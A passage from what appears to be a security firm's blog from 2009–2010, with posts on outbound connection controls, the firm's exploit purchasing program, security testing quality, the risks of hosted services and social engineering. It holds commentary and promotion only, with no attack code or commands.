(Thank god Netragard didn’t really embed a malicious link in this blog entry, right?)<br /><br />The good news is that suffering a compromise doesn’t need to be costly or technically damaging. If the proper policies, procedures and controls are in place, then a compromise can be relatively harmless from a cost-in-damages perspective. Outbound connection controls are an example of controls that everyone should have in place.<br /><br />If outbound connections are restricted to specific protocols and can only be established by authenticated users, then attacks like the one described above will be largely ineffective. The outbound controls might not always prevent the user’s computer from being compromised, but they will usually prevent the user’s computer from establishing a connection back to the attacker (which will ideally prevent the attacker from taking control of the computer). In such a case, the computer will need to be reinstalled, but at least the rest of the network will still be intact.<div><br /></div><div><b>Exploit Acquisition Program - More Details</b></div><div><span style="font-size:85%;">Adriel Desautels, 2010-03-28</span></div><div><br /></div>The recent news on <a href="http://blogs.forbes.com/firewall/2010/03/25/the-bounty-for-an-apple-bug-115000/">Forbes</a> about our Exploit Acquisition Program has generated a lot of speculation, controversy and curiosity. As a result, I've decided to take the time to follow up with this blog entry. Here I'll make a best effort to explain what the Exploit Acquisition Program is, why we decided to launch the program, and how the program works. 
<div><br /></div><div><b><span class="Apple-style-span" style="font-size:x-large;">What it is:</span></b></div><div><br /></div><div>The Exploit Acquisition Program ("EAP") officially started in May of 1999 and is currently being run by Netragard, LLC. The EAP is specifically designed to acquire "actionable research" in the form of working exploits from the security community. The Exploit Acquisition Program differs from other programs in that participants receive significantly higher pay for their work and, in most cases, the exploits never become public knowledge.</div><div><br /></div><div>The exploits that are acquired via the EAP are sold directly to specific US-based clients that have a unique and justifiable need for such technologies. At no point does Netragard sell or otherwise export acquired exploits to any foreign entities. Nor do we disclose any information about our buyers or about participating researchers.</div><div><br /></div><div><b><span class="Apple-style-span" style="font-size:x-large;">Why did we start the EAP?</span></b></div><div><br /></div><div>Netragard launched the EAP to give security researchers the opportunity to receive fair value for their research product. Our bidding prices start at or around $15,000 per exploit. That price is affected by many different variables.</div><div><br /></div><div><b><span class="Apple-style-span" style="font-size:x-large;">How does the EAP Work?</span></b></div><div><br /></div><div><b>The EAP works as follows:</b></div><div><ol><li>Researcher contacts Netragard.</li><li>Researcher and Netragard execute a Mutual Nondisclosure Agreement.</li><li>Researcher provides a verifiable form of identification to Netragard.</li><li>Researcher fills out an Exploit Acquisition Form ("EAF").</li><li>Netragard works with the buyer to determine the exploit's value based on the information provided in the EAF.</li><li>Researcher accepts or rejects the price. <b><span style="color: rgb(255, 0, 0);font-size:x-small;">Note:</span></b><span style="color: rgb(255, 0, 0);font-size:x-small;"> If rejected, the process stops here.</span></li><li>Researcher submits the exploit code and vulnerability details to Netragard.</li><li>Netragard verifies that the exploit works as advertised.</li><li>If the exploit does not work as advertised, the researcher is given the opportunity to resolve the issue(s).</li><li>If the exploit does work as advertised, the purchase agreement is delivered to the researcher.</li><li>Researcher executes the purchase agreement and transfers all rights and ownership of the exploit and any information related to the exploit to Netragard. <span style="color: rgb(255, 0, 0);">At this point the researcher loses all rights to the exploit and its respective information.</span></li><li>Netragard begins the payment process.</li><li>Payments are issued in three equal installments over the course of three months.</li></ol></div><div><b>EAP Rules</b></div><div><ol><li>Netragard requires exclusivity for all exploits purchased through the EAP.</li><li>Ownership of the exploit and its respective vulnerability information is transferred from researcher to Netragard at step 11 above. Prior to step 11 the exploit and its respective vulnerability information are the intellectual property of the researcher. If at any point before step 11 the researcher terminates the acquisition process, Netragard will destroy any and all information related to the failed transaction. <b>Termination of sale is not possible after step 11.</b></li><li>Netragard will not identify its buyers.</li><li>Netragard will not identify researchers.</li><li>All transactions between buyer, Netragard and developer are done legally and contractually. At no point will Netragard engage in illegal activity or with unknown, untrusted, and/or unverifiable sources or entities.</li></ol></div><div>If you are interested in selling your exploit to us, please contact us at eap@netragard.com.</div><div><br /></div><div><b>Professional Script Kiddies vs Real Talent</b></div><div><span style="font-size:85%;">Adriel Desautels, 2010-03-04</span></div><div><br /></div>The Good Guys in the security world are no different from the Bad Guys; most of them are nothing more than glorified script kiddies. The fact of the matter is that if you took all of the self-proclaimed hackers in the world and subjected them to a litmus test, very few would pass as actual hackers.<br /><br />This is true for both sides of the so-called Black and White Hat coin. In the Black Hat world, you have script kids who download programs written by other people and then use those programs to “hack” into networks. The White Hats do the exact same thing; only they buy the expensive tools instead of downloading them for free. 
Or maybe they’re actually paying for the pretty GUI, who knows?<br /><br />What is pitiable is that in just about all cases these script kiddies have no idea what the programs actually do. Sometimes that’s because they don’t bother to look at the code, but most of the time it’s because they just can’t understand it. If you think about it, that is scary. Do you really want to work with a security company that launches attacks against your network with tools that they do not fully understand? I sure wouldn’t.<br /><br />This is part of the reason why I feel that it is so important for any professional security services provider to maintain an active research team. I’m not talking about doing market research and pretending that it’s security research, like so many security companies do. I’m talking about doing actual vulnerability research and exploit development to help educate people about risks for the purposes of defense. After all, if a security company can’t write an exploit, then what business do they have launching exploits against your company?<br /><br />I am very proud to say that Everything Channel recently released the 2010 CRN Security Researchers list and that <a href="http://www.netragard.com/">Netragard’s Kevin Finisterre</a> was on the list. Other people included in the list are people that I have the utmost respect for. As far as I am concerned, <a href="http://www.entrepreneur.com/prnewswire/release/242610.html">these are <b>some</b> of the best guys in the industry:</a> <span style="font-size:85%;">(clearly this list is not all-inclusive and in no way includes all of the people that deserve credit for their contributions and/or talent).</span><br /><br /><ul><li>Dino Dai Zovi</li><li>Kevin Finisterre</li><li>Landon Fuller</li><li>Robert Graham</li><li>Jeremiah Grossman</li><li>Larry Highsmith</li><li>Billy Hoffman</li><li>Mikko Hypponen</li><li>Dan Kaminsky</li><li>Paul Kocher</li><li>Nate Lawson</li><li>David Litchfield</li><li>Charles Miller</li><li>Jeff Moss</li><li>Jose Nazario</li><li>Joanna Rutkowska</li></ul><br />In the end I suppose it all boils down to what the customer wants. Some customers want to know their risks; others just want to put a check in the box. For those who want to know what their real risks are, <a href="http://www.netragard.com/">you’ve come to the right place</a>.<div><br /></div><div><b>Hosted Solutions – A Hacker’s Haven</b></div><div><span style="font-size:85%;">Adriel Desautels, 2009-10-12</span></div><div><br /></div><p class="MsoNormal">Human beings are lazy by nature. If there is a choice to be made between a complicated technology solution and an easy technology solution, then nine times out of ten people will choose the easy solution. The problem is that the easy solutions are often riddled with hidden risks, and those risks can end up costing the consumer more money in damages than what might be saved by using the easy solution.</p> <p class="MsoNormal">The advantages of using a managed hosting provider to host your email, website, telephone systems, etc., are clear. When you outsource critical infrastructure components you save money. The savings are quickly realized because you no longer need to spend money running a full-scale IT operation. In 
many cases, you don’t even need to worry about purchasing hardware, software, or even hiring IT staff to support the infrastructure.</p> <p class="MsoNormal">What isn’t clear to most people is the serious risk that outsourcing can introduce to their business. In nearly all cases a business will have a radically lower risk and exposure profile if they keep everything in-house. This is true because of the substantial attack surface that hosting providers have when compared to in-house IT environments.</p> <p class="MsoNormal">For example, a web-hosting provider might host 1,000 websites across 50 physical servers. If one of those websites contains a single vulnerability and that vulnerability is exploited by a hacker, then the hacker will likely take control of the entire server. At that point the hacker will have successfully compromised and taken control of all 50 websites with a single attack.</p> <p class="MsoNormal">In non-hosted environments there might be only one Internet-facing website, as opposed to the 1000 that exist in a hosted environment. As such, the attack surface for this example would be 1000 times greater in a hosted environment than it is in a non-hosted environment. In a hosted environment the risks that other customers introduce to the infrastructure also become your risk. In a non-hosted environment you are only impacted by your own risks.</p> <p class="MsoNormal">To make matters worse, many people assume that such a risk isn’t significant because they do not use their hosted systems for any critical transactions. They fail to consider the fact that the hacker can modify the contents of the compromised system. These modifications can involve redirecting online banking portal links or credit card form posting links, or even spreading infectious malware. While this is true for any compromised system, the chances of suffering a compromise in a hosted environment are much greater than in a non-hosted environment.</p><div><br /></div><div><b>Social Engineering – It’s Nothing New</b></div><div><span style="font-size:85%;">Adriel Desautels, 2009-09-22</span></div><div><br /></div><div style="text-align: left;">With all the recent hype about Social Engineering, <a href="http://www.netragard.com/">we</a> figured that we’d chime in and tell people what’s really going on. The fact is that Social Engineering is nothing more than a Confidence Trick being carried out by a Con Artist. The only difference between the term Social Engineering and Confidence Trick is that Social Engineering is predominately used in relation to technology.</div> <p class="MsoNormal">So what is it really? 
Social Engineering is the act of exploiting a person’s natural tendency to trust another person or entity. Because the vulnerability exists within people, there is no truly effective method for remediation. That is not to say that you cannot protect your sensitive data, but it is to say that you cannot always prevent your people, or even yourself, from being successfully conned.</p> <p class="MsoNormal">The core ingredients required to perform a successful confidence trick are no different today than they were before the advent of the Internet. The con artist must have the victim’s trust, and then trick the victim into performing an action or divulging information. The Internet certainly didn’t create the risk, but it does make it easier for the threat to align with the risk.</p> <p class="MsoNormal">Before the advent of the Internet the con artist (threat) needed to contact the victim (risk) via telephone, in person, via snail mail, etc. Once contact was made, a good story needed to be put into place and the victim’s trust needed to be earned. That process could take months or even years, and even then success wasn’t guaranteed.</p> <p class="MsoNormal">The advent of the Internet provided the threat with many more avenues through which it could successfully align with the risk. Specifically, the Internet enables the threat to align with hundreds or even thousands of risks simultaneously. That sort of shotgun approach couldn’t be done before and significantly increases an attacker’s chances of success. One of the most elementary examples of this shotgun approach is the email-based phishing attack.</p> <p class="MsoNormal">The email-based phishing attack doesn’t earn the trust of its victims; it steals trust from existing relationships. Those relationships might exist between the victim and their bank, family member, co-worker, employer, etc. In all instances the email-based phishing attack hinges on the attacker’s ability to send emails that look like they are coming from a trusted source (exploitation of trust). From a technical perspective, email spoofing and phishing is trivial (<a href="http://snosoft.blogspot.com/2009/02/facebook-from-hackers-perspective.html"><b><i>click here</i></b></a><b><i> for a more sophisticated attack example</i></b>).</p> <p class="MsoNormal">The reason why it is possible for an attacker to steal trust from a victim instead of earning it is that “face to face” trust isn’t portable to the Internet. For example, most people trust their spouse. Many people talk to their spouse on AIM, MSN, Yahoo, Skype, etc. while at work. How do they know that they are really chatting with their spouse and not a hacker?</p> <p class="MsoNormal">So how do you protect against the social risks and prevent the threat from successfully aligning with those risks? The truth is that you can't. Con artists have been conning people since the dawn of man. The better question is: what are you doing to <a href="https://www.netragard.com">protect your data</a> from the hacker that does penetrate your IT infrastructure?</p><div><br /></div><div><b>Why “DISSECTING THE HACK: The F0rb1dd3n Network” was written. By: Jayson E. Street</b></div><div><span style="font-size:85%;">Posted by Adriel Desautels, 2009-07-24</span></div><div><br /></div><span style="font-size:85%;"><span style="font-weight: bold;">Note:</span> This blog entry was written by Jayson E. Street and published on his behalf.</span><br /><br />The consumer, the corporate executive, and the government official. Regardless of your perspective, DISSECTING THE HACK: The F0rb1dd3n Network was written to illustrate the issues of Information Security through story. We all tell stories. In fact, we do our best communicating through stories. This book illustrates how very real twenty-first century threats are woven into the daily lives of people in different walks of life.<br /><br />Three kids in Houston, Texas. A mid-level Swiss businessman traveling abroad. A technical support worker with a gambling problem. An international criminal who will do anything for a profit (and maybe other motives). FBI agents trying to unravel a dangerous puzzle. A widower-engineer just trying to survive. These are just some of the lives brought together in a story of espionage, friendship, puzzles, hacks, and more. Every attack is real. We even tell you how some of these attacks are done. And we tell you how to defend against varied attacks as well.<br /><br />DISSECTING THE HACK: The F0rb1dd3n Network is a two-part work. The first half is a story that can be read by itself. 
The second half is a technical reference work that can also be read alone. But together, each provides texture and context for the other. The technical reference – called the STAR or “Security Threats Are Real” – explains the “how” and “why” behind much of the story. STAR addresses technical material, policy issues, hacker culture context, and even explains the “Easter Eggs” in the story.<br /><br />This book is the product of a community of Information Security professionals. It is written to illustrate how we are all interesting targets for various reasons. We may be a source of money for criminals through fraud, we might have computing resources that can be used to launch attacks on someone else, or we may be responsible for protecting valuable information. The reasons we are attacked are legion – and so are the ways we are attacked. Our goal is to raise awareness in a community of people who are under-served. Few of us really want dry lectures about how we should act to protect ourselves. But stories of criminals, corporate espionage, friendship and a little juvenile delinquency – now that is the way to learn.<div><br /></div><div><b>Verify Your Security Provider -- The truth behind manual testing.</b></div><div><span style="font-size:85%;">Adriel Desautels, 2009-07-16</span></div><div><br /></div><p class="MsoNormal">Something that I’ve been preaching for a while is that automated vulnerability scanners do not produce quality results and as such shouldn’t be relied on for penetration tests or vulnerability assessments. I’ve been telling people that they should look for a security company that offers manual testing, not just automated scans. The price points for quality work will be significantly higher, but in the end the value is much greater. After all, the cost in damages of a single successful compromise is far greater than the cost of the best possible security services. 
</p> <p class="MsoNormal">I’ve noticed that there are a bunch of vendors who claim to be performing manual testing. But when I dig into their methodologies, their manual testing isn’t real manual testing at all; it’s just vetting of automated scanner results, or testing based on those results. In other words, they test only what the automated scanner reports and don’t do any real manual discovery. I’m not saying that tools like Nessus (an automated scanner) don’t have their place, I’m just saying that they aren’t going to protect you from the bad guys. If you want to be protected from the threat, you need to be tested at a level that is a few notches higher than the threat that you are likely to face in the real world.</p> <p class="MsoNormal">This is akin to how the Department of Defense tests the armor on its tanks, and I’ve probably mentioned this before somewhere on the blog. We don’t test our tanks against fire from BB guns and .22 caliber pistols. If we did, they wouldn’t be very effective in war. We test the tanks against a threat that is a few levels higher in intensity than what they are likely to face in the real world. As a result, the tank can withstand most threats and is a very effective weapon. Doing anything less isn’t going to protect you when the threat tries to align with your risks; you’ll end up being an expensive casualty of war.</p> <p class="MsoNormal">So why do some security companies test at this lesser level? It’s simple really: they are in the business of making money and care more about that than they do about actually protecting their customers’ infrastructure. Additionally, there is a market for that sort of low-quality testing. There are some businesses that don’t actually care about their security posture; they just care about passing the test so that they can put a check in their compliance box. Then there are other businesses that unknowingly get taken advantage of by vendors because they don’t know the difference between high-quality and low-quality services.</p> <p class="MsoNormal">So what is the difference between high quality and low quality? From a high-level perspective, it’s the difference between real, manual, research-based security testing and everything else. Once hackers have access, they can do anything to your data, from stealing it to installing back-door technology in your product's source code. It’s happened before, and it’s going to happen again.</p><p class="MsoNormal"><b>When a company tells you that they perform manual testing, hold their feet to the fire. You can do the following things to verify it:</b></p><ul><li>Dig into their methodology and ask them specific questions about how they perform their testing (see our white papers on how to do that).</li><li>Don’t swallow jargon and terms that sound cool but don’t mean anything; use Wikipedia to look up the terms and make sure that they make sense.</li><li>Ask them for the names of their security experts and then use tools like <a href="http://www.google.com">Google</a>, <a href="http://www.linkedin.com">LinkedIn</a>, <a href="http://www.facebook.com">Facebook</a> and <a href="http://www.pipl.com">PIPL</a> to do research on those experts. If nothing comes up, then chances are their experts aren’t experts at all.</li><li>Search vulnerability databases like <a href="http://www.milw0rm.com/">milw0rm</a>, <a href="http://www.securityfocus.com/">securityfocus</a>, <a href="http://www.vupen.com/english/">sirtfr</a>, <a href="http://secunia.com/advisories/">secunia</a>, <a href="http://www.packetstormsecurity.org/">packetstormsecurity</a>, etc. for the vendor’s name to see if they have <a href="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Netragard&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0">research capabilities</a>. If you don’t get anything in return, then chances are that they don’t have research capabilities. If that’s the case, then how do you expect them to perform quality manual testing? Chances are that they won’t be able to.</li></ul> <p class="MsoNormal">Remember, you’re putting the integrity of your business and its respective name into their hands.</p>